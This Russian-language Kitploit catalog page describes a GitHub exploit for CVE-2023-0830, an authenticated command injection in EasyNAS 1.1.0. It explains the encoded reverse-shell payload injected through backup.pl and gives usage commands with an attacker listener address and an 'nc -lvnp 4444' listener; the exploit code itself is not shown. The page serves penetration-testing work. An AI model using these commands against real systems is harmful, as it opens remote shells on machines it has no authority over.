Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-0830 — Эксплойт для EasyNAS версии 1.1.0. Используемая уязвимость — это недостаток внедрения команд, который требует аутентификации. | Kitploit
Инструменты/GitHubGitHub/xbz0n/cve-2023-0830
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubxbz0n/cve-2023-0830

CVE-2023-0830

Эксплойт для EasyNAS версии 1.1.0. Используемая уязвимость — это недостаток внедрения команд, который требует аутентификации.

Репозиторий
1121 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-0830: Эксплойт аутентифицированной инъекции команд в ОС EasyNAS 1.1.0

Этот Python-скрипт представляет собой мощный эксплойт для EasyNAS версии 1.1.0 с расширенной функциональностью, включая встроенный слушатель. Эксплуатируемая уязвимость — это недостаток инъекции команд, требующий аутентификации.

Скрипт устанавливает сессию с целевым сервером, затем отправляет запрос на вход с предоставленными учётными данными. После успешной аутентификации скрипт формирует полезную нагрузку, которая при выполнении открывает обратное соединение к указанным пользователем IP-адресу и порту. Эта полезная нагрузка кодируется в URL и Base64, а затем внедряется в файл backup.pl на сервере через поддельный GET-запрос.

CVE: CVE-2023-0830

Автор эксплойта

Ivan Spiridonov (xbz0n) https://xbz0n.sh

Домашняя страница разработчика

https://www.easynas.org

Возможности

  • Встроенный слушатель обратной оболочки — не нужен отдельный процесс netcat
  • Автоматическое определение IP-адреса для слушателя
  • Возможность использования различных типов оболочки (bash, sh, python)
  • Поддержка HTTP и HTTPS
  • Поддержка внешних слушателей
  • Использование

    Базовое использование со встроенным слушателем (рекомендуется):

    root@kitploit:~
    python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
    

    Использование внешнего слушателя (сначала запустите nc -lvnp 4444):

    root@kitploit:~
    python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
    

    Опции:

    root@kitploit:~
    --mode {shell,reverse}    Режим эксплуатации: shell (встроенная обратная оболочка) или reverse (внешний слушатель)
    --lhost IP_ADDRESS        IP-адрес для слушателя обратной оболочки (определяется автоматически по умолчанию)
    --lport PORT              Порт для слушателя обратной оболочки (по умолчанию: 4444)
    --protocol {http,https}   Используемый протокол (по умолчанию: https)
    --verbose                 Включить подробный вывод
    --shell {bash,sh,python}  Укажите тип оболочки для встроенного слушателя (по умолчанию: bash)
    

    Зависимости

    • Python 3
    • Библиотека Requests

    Отказ от ответственности

    Этот скрипт предназначен только для образовательных целей и авторизованного тестирования на проникновение. Всегда получайте явное разрешение перед запуском тестов на проникновение в сети или системы.

    Пожалуйста, используйте ответственно.

    Скачать инструмент